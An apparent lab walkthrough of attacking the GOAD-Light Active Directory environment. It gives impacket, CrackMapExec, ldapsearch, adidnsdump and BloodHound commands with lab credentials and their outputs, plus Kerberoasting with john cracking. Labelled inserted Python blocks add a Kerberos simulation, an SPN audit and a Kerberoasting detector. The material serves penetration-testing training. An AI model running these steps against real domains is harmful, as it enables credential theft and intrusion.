GOAD-Light Part 3: User Enumeration

GOAD-Light_schema

Listing users

  • In the previous part we obtained some user credentials.
  • Once you have an account on Active Directory, the first thing to do is always to obtain the full list of users.
  • By default, any ordinary authenticated user in the domain may read most of the information in Active Directory (users, groups, computers, and so on).
  • Once you have that list, you can password-spray the complete set of users (you will often find other accounts with weak passwords such as username=password, SeasonYear!, SocietynameYear! or even 123456).

Using GetADUsers

impacket-GetADUsers -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople

Name              Email   PasswordLastSet             LastLogon
----------------  ------  --------------------------  --------------------------
Administrator             2026-01-19 09:34:50.134674  2026-01-19 12:21:19.905572
Guest
vagrant                   2021-05-12 07:38:55.922520  2026-01-19 12:35:28.841680
krbtgt                    2026-01-19 10:35:49.810135
                          2026-01-19 10:45:49.918582
arya.stark                2026-01-19 10:52:42.105948  2026-01-21 03:19:41.983083
eddard.stark              2026-01-19 10:52:45.526683  2026-01-21 03:30:14.230322
catelyn.stark             2026-01-19 10:52:48.633203
robb.stark                2026-01-19 10:52:51.773736  2026-01-21 03:31:27.464624
sansa.stark               2026-01-19 10:52:54.806231
brandon.stark             2026-01-19 10:52:58.102719  2026-01-20 11:03:09.129559
rickon.stark              2026-01-19 10:53:01.336615
hodor                     2026-01-19 10:53:04.303499
jon.snow                  2026-01-19 10:53:07.368009
samwell.tarly             2026-01-19 10:53:10.495621
jeor.mormont              2026-01-19 10:53:13.524535
sql_svc                   2026-01-19 10:53:16.602142  2026-01-21 02:26:11.538802

Using CME

crackmapexec smb -u samwell.tarly -p Heartsbane -d north.sevenkingdoms.local 192.168.56.11 --users

┌──(kali㉿kali)-[~/GOAD]
└─$ crackmapexec smb -u samwell.tarly -p Heartsbane -d north.sevenkingdoms.local 192.168.56.11 --users
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SSH protocol database
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SMB 192.168.56.11 445 WINTERFELL [+] Enumerated domain user(s)
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\sql_svc badpwdcount: 0 desc: s
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\jeor.mormont badpwdcount: 1 desc: J
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\samwell.tarly badpwdcount: 1 desc: S
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\jon.snow badpwdcount: 1 desc: J
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\hodor badpwdcount: 0 desc: B
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\rickon.stark badpwdcount: 0 desc: R
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\brandon.stark badpwdcount: 1 desc: B
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\sansa.stark badpwdcount: 0 desc: S
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\robb.stark badpwdcount: 0 desc: R
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\catelyn.stark badpwdcount: 1 desc: C
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\eddard.stark badpwdcount: 0 desc: E
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\arya.stark badpwdcount: 0 desc: A
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\krbtgt badpwdcount: 0 desc: K
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\vagrant badpwdcount: 0 desc: V
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\Guest badpwdcount: 1 desc: B
SMB 192.168.56.11 445 WINTERFELL north.sevenkingdoms.local\Administrator badpwdcount: 1 desc: B

LDAP query

ldapsearch -H ldap://192.168.56.11 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=north,DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:'

distinguishedName: CN=Administrator,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=Guest,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=vagrant,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=krbtgt,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=SEVENKINGDOMS$,CN=Users,DC=north,DC=sevenkingdoms,DC=loc
distinguishedName: CN=arya.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=eddard.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=catelyn.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=robb.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=sansa.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=brandon.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=rickon.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=hodor,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=samwell.tarly,CN=Users,DC=north,DC=sevenkingdoms,DC=loca
distinguishedName: CN=jeor.mormont,CN=Users,DC=north,DC=sevenkingdoms,DC=local
distinguishedName: CN=sql_svc,CN=Users,DC=north,DC=sevenkingdoms,DC=local

Because a trust relationship exists, we can also use LDAP queries to request the users of the other domains.

On sevenkingdoms.local

ldapsearch -H ldap://192.168.56.10 -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))"

Parent domain user structure

sevenkingdoms.local
├── CN=Users (default container)
│   ├── Administrator
│   ├── Guest
│   ├── vagrant
│   ├── krbtgt
│   └── NORTH$ (child domain computer account)
├── OU=Crownlands
│   ├── tywin.lannister
│   ├── jaime.lannister
│   ├── cersei.lannister
│   ├── robert.baratheon
│   ├── joffrey.baratheon
│   ├── renly.baratheon
│   ├── stannis.baratheon
│   ├── petyer.baelish
│   ├── lord.varys
│   └── maester.pycelle
└── OU=Westerlands
    └── tyron.lannister

distinguishedName: CN=Administrator,CN=Users,DC=sevenkingdoms,DC=local
distinguishedName: CN=Guest,CN=Users,DC=sevenkingdoms,DC=local
distinguishedName: CN=vagrant,CN=Users,DC=sevenkingdoms,DC=local
distinguishedName: CN=krbtgt,CN=Users,DC=sevenkingdoms,DC=local
distinguishedName: CN=NORTH$,CN=Users,DC=sevenkingdoms,DC=local
distinguishedName: CN=ESSOS$,CN=Users,DC=sevenkingdoms,DC=local
distinguishedName: CN=tywin.lannister,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=jaime.lannister,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=cersei.lannister,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=tyron.lannister,OU=Westerlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=robert.baratheon,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=joffrey.baratheon,OU=Crownlands,DC=sevenkingdoms,DC=loca
distinguishedName: CN=renly.baratheon,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=stannis.baratheon,OU=Crownlands,DC=sevenkingdoms,DC=loca
distinguishedName: CN=petyer.baelish,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=lord.varys,OU=Crownlands,DC=sevenkingdoms,DC=local
distinguishedName: CN=maester.pycelle,OU=Crownlands,DC=sevenkingdoms,DC=local

Kerberoasting

The Kerberos protocol

Kerberos is a network authentication protocol developed at MIT (the Massachusetts Institute of Technology).

It is designed to provide strong authentication for client/server applications by using secret-key cryptography.

Three main roles take part in the Kerberos protocol:

  1. The Client that accesses a service (referred to below as the Client or the user)
  2. The Server that provides the service (referred to below as the service)
  3. The KDC (Key Distribution Center)

The KDC service is installed by default on a domain controller, while the Client and Server are users or services within the domain, such as an HTTP service or an SQL service. In Kerberos, whether a Client is allowed to access a service on the Server is decided by the tickets issued by the KDC.

image-20260121164414122

  1. AS_REQ: the Client sends an AS_REQ to the KDC; the request credential is a timestamp encrypted with the Client's hash.
  2. AS_REP: the KDC decrypts it with the Client's hash; if the result is correct it returns a TGT encrypted with the krbtgt hash. The TGT contains a PAC, and the PAC contains the Client's SID and the groups the Client belongs to.
  3. TGS_REQ: using the TGT, the Client sends the KDC a TGS_REQ for a specific service.
  4. TGS_REP: the KDC decrypts with the krbtgt hash; if the result is correct it returns a TGS ticket encrypted with the service's hash (this step does not check whether the user is allowed to access the service: as long as the TGT is valid, a TGS ticket is returned).
  5. AP_REQ: the Client presents the TGS ticket to the service.
  6. AP_REP: the service decrypts the TGS ticket with its own hash; if decryption succeeds it takes the PAC to the KDC and asks whether the Client is allowed access. The domain controller decrypts the PAC to obtain the Client's SID and groups, then checks the service's ACL to decide whether the Client may access the service.
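The six steps above as an added simulation (not part of the original post): a toy KDC, client and service pass the TGT and service ticket around under the krbtgt, client and service keys. The sealing routine is a stand-in for the real Kerberos encryption types, and the principals, passwords, group memberships and the MSSQL ACL are constructed lab data. It makes the point in step 4 concrete: a service ticket is issued for any valid TGT, and access is only decided in the AP exchange.

```python
import hashlib
import hmac
import json
import os
import time

# Toy sealing (HMAC-SHA256 keystream plus MAC) standing in for the Kerberos
# encryption types; it exists only to make the key relationships visible.
def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    out, ctr = b"", 0
    while len(out) < n:
        out += hmac.new(key, nonce + ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:n]

def seal(key: bytes, obj: dict) -> bytes:
    pt = json.dumps(obj).encode()
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()

def unseal(key: bytes, blob: bytes) -> dict:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("wrong key or tampered ticket")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))

def long_term_key(password: str) -> bytes:
    # Stand-in for the account's long-term key (the "hash" in the steps above)
    return hashlib.sha256(password.encode()).digest()

# Constructed lab data: long-term keys, group membership, SPN ownership, service ACL
KEYS = {
    "krbtgt": long_term_key("krbtgt-secret"),
    "brandon.stark": long_term_key("iseedeadpeople"),
    "hodor": long_term_key("hodor-secret"),
    "sql_svc": long_term_key("sql-svc-secret"),
}
GROUPS = {"brandon.stark": ["Stark"], "hodor": ["Domain Users"]}
SPN_OWNER = {"MSSQLSvc/castelblack.north.sevenkingdoms.local:1433": "sql_svc"}
MSSQL_ACL = {"Stark"}  # groups allowed to use the MSSQL service

class KDC:
    def _sign_pac(self, pac: dict) -> str:
        return hmac.new(KEYS["krbtgt"], json.dumps(pac).encode(), hashlib.sha256).hexdigest()

    def as_exchange(self, client: str, pre_auth: bytes) -> bytes:
        # AS_REQ/AS_REP: open the timestamp with the client's key, then issue a
        # TGT (signed PAC inside) sealed with the krbtgt key.
        ts = unseal(KEYS[client], pre_auth)["ts"]
        if abs(time.time() - ts) > 300:
            raise ValueError("timestamp outside the allowed clock skew")
        pac = {"user": client, "groups": GROUPS.get(client, [])}
        return seal(KEYS["krbtgt"], {"pac": pac, "pac_sig": self._sign_pac(pac)})

    def tgs_exchange(self, tgt: bytes, spn: str) -> bytes:
        # TGS_REQ/TGS_REP: only the TGT is checked; no authorization happens here,
        # and the service ticket is sealed with the SPN owner's long-term key.
        body = unseal(KEYS["krbtgt"], tgt)
        return seal(KEYS[SPN_OWNER[spn]], {"pac": body["pac"], "pac_sig": body["pac_sig"], "spn": spn})

    def authorize(self, pac: dict, pac_sig: str, acl: set) -> bool:
        # PAC validation: the DC checks the PAC it signed, then applies the ACL
        if not hmac.compare_digest(pac_sig, self._sign_pac(pac)):
            raise ValueError("PAC signature invalid")
        return any(g in acl for g in pac["groups"])

def ap_exchange(kdc: KDC, ticket: bytes) -> bool:
    # AP_REQ/AP_REP: the service opens the ticket with its own key, then asks the
    # KDC whether the PAC's groups are allowed by the service ACL.
    body = unseal(KEYS["sql_svc"], ticket)
    return kdc.authorize(body["pac"], body["pac_sig"], MSSQL_ACL)

def run_client(user: str, spn: str) -> dict:
    kdc = KDC()
    tgt = kdc.as_exchange(user, seal(KEYS[user], {"ts": time.time()}))
    ticket = kdc.tgs_exchange(tgt, spn)  # issued for any valid TGT
    return {"tgs_issued": True, "access_granted": ap_exchange(kdc, ticket)}
```

Running `run_client("hodor", spn)` returns a ticket but no access, while `brandon.stark` (member of Stark) gets both.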

SPN

SPN overview

An SPN (Service Principal Name) is the unique identifier of a service instance (for example an HTTP, MSSQL or MySQL service). An SPN uniquely identifies a service running on a server, and every service that uses Kerberos needs an SPN.

SPNs come in two kinds: one is registered under a machine account (Computers) in AD, the other under a domain user account (Users).

When a service runs as Local System or Network Service, its SPN is registered under the machine account (Computers).

When a service runs as a domain user, its SPN is registered under that domain user account (Users).

SPN format:

serviceclass/host:port/servicename
  1. serviceclass can be understood as the name of the service; common values are www, ldap, SMTP, DNS, HOST and so on
  2. host takes two forms, an FQDN or a NetBIOS name, for example server01.test.com or server01
  3. If the service runs on its default port, the port number (port) may be omitted

Kerberoasting

Discover services (for example MSSQL) through their SPNs.

This requires only ordinary domain user privileges.

Interact with the SPN's service and request a Kerberos ticket (once the user's TGT has been validated, the TGS sends the user a ticket; that ticket is encrypted with the same NTLM hash as the service account of the service associated with the SPN, for example the hash of the MSSQL account).

Generate hashes from a wordlist and try them to open that Kerberos ticket.

If this succeeds, the password of the MSSQL service account has been obtained.

An attacker can then forge a TGS silver ticket that identifies the accessing account as a domain administrator, thereby obtaining domain-administrator access to the service.

Or use it for delegation attacks (service accounts are very often configured for delegation; if unconstrained delegation is set, obtaining the service account's password can directly yield domain administrator privileges).

Using impacket

impacket-GetUserSPNs -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes

┌──(kali㉿kali)-[~/GOAD]
└─$ impacket-GetUserSPNs -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName                                 Name         MemberOf                                                     PasswordLastSet             LastLogon                   Delegation
---------------------------------------------------  -----------  -----------------------------------------------------------  --------------------------  --------------------------  -----------
HTTP/eyrie.north.sevenkingdoms.local                 sansa.stark  CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local         2026-01-19 10:52:54.806231
CIFS/winterfell.north.sevenkingdoms.local            jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local   2026-01-19 10:53:07.368009                              constrained
HTTP/thewall.north.sevenkingdoms.local               jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local   2026-01-19 10:53:07.368009                              constrained
MSSQLSvc/castelblack.north.sevenkingdoms.local       sql_svc                                                                   2026-01-19 10:53:16.602142  2026-01-21 02:26:11.538802
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433  sql_svc                                                                   2026-01-19 10:53:16.602142  2026-01-21 02:26:11.538802
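An added example, not from the original post or from Impacket: a parser for the serviceclass/host:port/servicename format described in the SPN section, applied to rows modelled on the GetUserSPNs table above, producing the review list a defender would draw from the same data (user accounts holding SPNs, stale passwords, delegation, privileged group membership). The older sql_svc password date, the CASTELBLACK$ machine-account row and the privileged-group patterns are constructed assumptions.

```python
from __future__ import annotations
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass
class SPN:
    service_class: str
    host: str
    port: int | None = None
    instance: str | None = None      # MSSQL-style named instance in the port position
    service_name: str | None = None

def parse_spn(spn: str) -> SPN:
    """Split serviceclass/host[:port][/servicename] into its parts."""
    service_class, sep, rest = spn.partition("/")
    if not sep or not service_class or not rest:
        raise ValueError(f"malformed SPN: {spn!r}")
    hostport, _, service_name = rest.partition("/")
    host, _, portpart = hostport.partition(":")
    if not host:
        raise ValueError(f"SPN without host: {spn!r}")
    out = SPN(service_class, host.lower(), service_name=service_name or None)
    if portpart.isdigit():
        out.port = int(portpart)
    elif portpart:
        out.instance = portpart
    return out

@dataclass
class SpnAccount:
    spn: str
    account: str
    member_of: str
    pwd_last_set: datetime
    delegation: str = ""

# Constructed rows modelled on the GetUserSPNs table above; sql_svc is given an
# older password date and a machine-account row is added so every check fires once.
ROWS = [
    SpnAccount("HTTP/eyrie.north.sevenkingdoms.local", "sansa.stark",
               "CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local",
               datetime(2026, 1, 19, 10, 52, 54)),
    SpnAccount("CIFS/winterfell.north.sevenkingdoms.local", "jon.snow",
               "CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local",
               datetime(2026, 1, 19, 10, 53, 7), "constrained"),
    SpnAccount("MSSQLSvc/castelblack.north.sevenkingdoms.local:1433", "sql_svc", "",
               datetime(2024, 6, 1)),
    SpnAccount("MSSQLSvc/castelblack.north.sevenkingdoms.local:REPORTS", "CASTELBLACK$", "",
               datetime(2026, 1, 1)),
]

# Hypothetical DN prefixes of groups that should never own a Kerberoastable SPN
PRIVILEGED = ("CN=Domain Admins,", "CN=Administrators,", "CN=Enterprise Admins,")

def audit(rows: list[SpnAccount], as_of: datetime, max_age_days: int = 365) -> dict[str, list[str]]:
    """Return, per account, the reasons a defender should review it."""
    findings: dict[str, list[str]] = {}
    for r in rows:
        spn = parse_spn(r.spn)
        reasons = []
        if not r.account.endswith("$"):
            # An SPN on a user account is what makes that account Kerberoastable
            reasons.append(f"user account holds SPN {spn.service_class}/{spn.host}")
        if as_of - r.pwd_last_set > timedelta(days=max_age_days):
            reasons.append(f"password older than {max_age_days} days")
        if r.delegation:
            reasons.append(f"{r.delegation} delegation configured")
        if any(p in r.member_of for p in PRIVILEGED):
            reasons.append("member of a privileged group")
        if reasons:
            findings.setdefault(r.account, []).extend(reasons)
    return findings
```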

Using cme

crackmapexec ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING

┌──(kali㉿kali)-[~/GOAD]
└─$ crackmapexec ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
LDAP 192.168.56.11 389 WINTERFELL [+] north.sevenkingdoms.local\brandon.stark:iseedeadpeople
LDAP 192.168.56.11 389 WINTERFELL [*] Total of records returned 5
CRITICAL:impacket:CCache file is not found. Skipping...
LDAP 192.168.56.11 389 WINTERFELL sAMAccountName: sansa.stark memberOf: CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local pwdLastSet: 2026-01-19 10:52:54.806231 lastLogon:
LDAP 192.168.56.11 389 WINTERFELL sAMAccountName: jon.snow memberOf: CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local pwdLastSet: 2026-01-19 10:53:07.368009 lastLogon:
LDAP 192.168.56.11 389 WINTERFELL sAMAccountName: sql_svc memberOf: pwdLastSet: 2026-01-19 10:53:16.602142 lastLogon:2026-01-21 02:26:11.538802

Cracking with john

# $krb5tgs$ hashes from --kerberoasting use the krb5tgs format (krb5asrep is for AS-REP roasting)
john --wordlist=/usr/share/wordlists/rockyou.txt KERBEROASTING --format=krb5tgs

Another user's credentials obtained successfully

north.sevenkingdoms.local\jon.snow:iknownothing
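On the detection side, an added example that is not part of the original post: Kerberoasting tools request RC4 (etype 0x17) service tickets, so a burst of Windows Security event 4769 entries from one account for several user-owned services is the usual signal. The events below are constructed samples modelled on the 4769 fields; the window and threshold are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events modelled on Windows Security event 4769 fields:
# TargetUserName (requesting account), ServiceName (account owning the SPN),
# TicketEncryptionType (0x17 = RC4-HMAC, 0x12 = AES256) and IpAddress.
EVENTS = [
    {"ts": "2026-01-21T02:10:01", "TargetUserName": "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "sansa.stark", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.56.100"},
    {"ts": "2026-01-21T02:10:01", "TargetUserName": "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "jon.snow", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.56.100"},
    {"ts": "2026-01-21T02:10:02", "TargetUserName": "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "sql_svc", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.56.100"},
    # Normal activity (AES tickets, a machine-account service, a lone RC4 ticket) must not alert
    {"ts": "2026-01-21T02:11:30", "TargetUserName": "arya.stark@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "WINTERFELL$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.56.23"},
    {"ts": "2026-01-21T02:12:00", "TargetUserName": "robb.stark@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "sql_svc", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:192.168.56.24"},
    {"ts": "2026-01-21T02:40:00", "TargetUserName": "robb.stark@NORTH.SEVENKINGDOMS.LOCAL",
     "ServiceName": "sansa.stark", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:192.168.56.24"},
]

RC4 = "0x17"

def detect_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Flag (user, source IP) pairs that obtained RC4 service tickets for
    min_services or more distinct user-owned services within one window."""
    # Bucket RC4 requests for user-owned (non-$, non-krbtgt) services per requester
    by_requester = defaultdict(list)
    for e in events:
        svc = e["ServiceName"]
        if e["TicketEncryptionType"] != RC4 or svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        key = (e["TargetUserName"].split("@")[0].lower(), e["IpAddress"])
        by_requester[key].append((datetime.fromisoformat(e["ts"]), svc))

    alerts = []
    for (user, ip), reqs in by_requester.items():
        reqs.sort()
        # Sliding window over the requester's RC4 requests, earliest start first
        for i, (t0, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                alerts.append({"user": user, "ip": ip, "services": sorted(services),
                               "start": t0.isoformat()})
                break
    return alerts
```

Lowering `min_services` to 1 turns the rule into a plain RC4 service-ticket inventory, which is useful when moving a domain to AES-only service accounts.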

Share enumeration

Trying the account and password just obtained, a new share turns out to be readable (in this lab it contains nothing, but in a real engagement you will often find interesting information there).

crackmapexec smb 192.168.56.10-22 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares

┌──(kali㉿kali)-[~/GOAD]
└─$ crackmapexec smb 192.168.56.10-22 -u jon.snow -p iknownothing -d north.sevenkingdoms.local --shares
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10.0 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10.0 Build 17763 x64 (name:KINGSLANDING) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] north.sevenkingdoms.local\jon.snow:iknownothing
SMB 192.168.56.11 445 WINTERFELL [+] Enumerated shares
SMB 192.168.56.11 445 WINTERFELL Share Permissions Remark
SMB 192.168.56.11 445 WINTERFELL ----- ----------- ------
SMB 192.168.56.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 192.168.56.11 445 WINTERFELL C$ Default share
SMB 192.168.56.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 192.168.56.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 192.168.56.11 445 WINTERFELL SYSVOL READ Logon server share
SMB 192.168.56.22 445 CASTELBLACK [+] north.sevenkingdoms.local\jon.snow:iknownothing
SMB 192.168.56.10 445 KINGSLANDING [+] north.sevenkingdoms.local\jon.snow:iknownothing
SMB 192.168.56.22 445 CASTELBLACK [+] Enumerated shares
SMB 192.168.56.22 445 CASTELBLACK Share Permissions Remark
SMB 192.168.56.22 445 CASTELBLACK ----- ----------- ------
SMB 192.168.56.22 445 CASTELBLACK ADMIN$ Remote Admin
SMB 192.168.56.22 445 CASTELBLACK all READ,WRITE Basic RW share for all
SMB 192.168.56.22 445 CASTELBLACK C$ Default share
SMB 192.168.56.22 445 CASTELBLACK IPC$ READ Remote IPC
SMB 192.168.56.22 445 CASTELBLACK public READ Basic Read share for all domain users
SMB 192.168.56.10 445 KINGSLANDING [+] Enumerated shares
SMB 192.168.56.10 445 KINGSLANDING Share Permissions Remark
SMB 192.168.56.10 445 KINGSLANDING ----- ----------- ------
SMB 192.168.56.10 445 KINGSLANDING ADMIN$ Remote Admin
SMB 192.168.56.10 445 KINGSLANDING C$ Default share
SMB 192.168.56.10 445 KINGSLANDING CertEnroll READ Active Directory Certificate Services share
SMB 192.168.56.10 445 KINGSLANDING IPC$ READ Remote IPC
SMB 192.168.56.10 445 KINGSLANDING NETLOGON READ Logon server share
SMB 192.168.56.10 445 KINGSLANDING SYSVOL READ Logon server share

DNS dump

Active Directory Integrated DNS dump tool

Using the domain user privileges we currently hold, read out every DNS record in the domain.

AD-integrated DNS allows authenticated users to list all records in a zone.

By default, any user in Active Directory can enumerate all DNS records in the domain or forest DNS zones, similar to a zone transfer. This tool enables enumeration and export of all DNS records in a zone, for reconnaissance of the internal network.

adidnsdump -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' winterfell.north.sevenkingdoms.local

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 5 records

type,name,value
A,winterfell,192.168.56.11
A,DomainDnsZones,192.168.56.11
?,castelblack,?
NS,@,winterfell.north.sevenkingdoms.local.
A,@,192.168.56.11

BloodHound

Reference

https://en.hackndo.com/bloodhound/#going-further

  • BloodHound is one of the best tools for Active Directory penetration testing; it helps you find every path to compromising the AD and is a must-have in your arsenal!
  • To use BloodHound, you first need to collect all the data from the different domains

On Linux, use the Python collector directly:

https://github.com/fox-it/BloodHound.py

On Windows, you can use:

https://github.com/BloodHoundAD/SharpHound

RustHound supports ADCS collection:

https://github.com/OPENCYBER-FR/RustHound

Installation

sudo apt install bloodhound.py -y

Collecting data

bloodhound-python --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local -ns 192.168.56.10

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: north.sevenkingdoms.local
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 2 computers
INFO: Connecting to GC LDAP server: winterfell.north.sevenkingdoms.local
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local
INFO: Found 17 users
INFO: Found 51 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: castelblack.north.sevenkingdoms.local
INFO: Querying computer: winterfell.north.sevenkingdoms.local
INFO: Done in 00M 01S
INFO: Compressing output into 20260121041638_bloodhound.zip

bloodhound-python --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local -ns 192.168.56.10

INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sevenkingdoms.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local
INFO: Found 16 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 9 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: kingslanding.sevenkingdoms.local
INFO: Done in 00M 00S
INFO: Compressing output into 20260121041749_bloodhound.zip

BloodHound installation reference

https://www.cnblogs.com/yuy0ung/articles/18411240

Show all domains and hosts

MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p

image-20260121193915738

Show all users

MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p

image-20260121194323948

Mapping between domain, group and user

MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q

image-20260121194456191

User ACLs

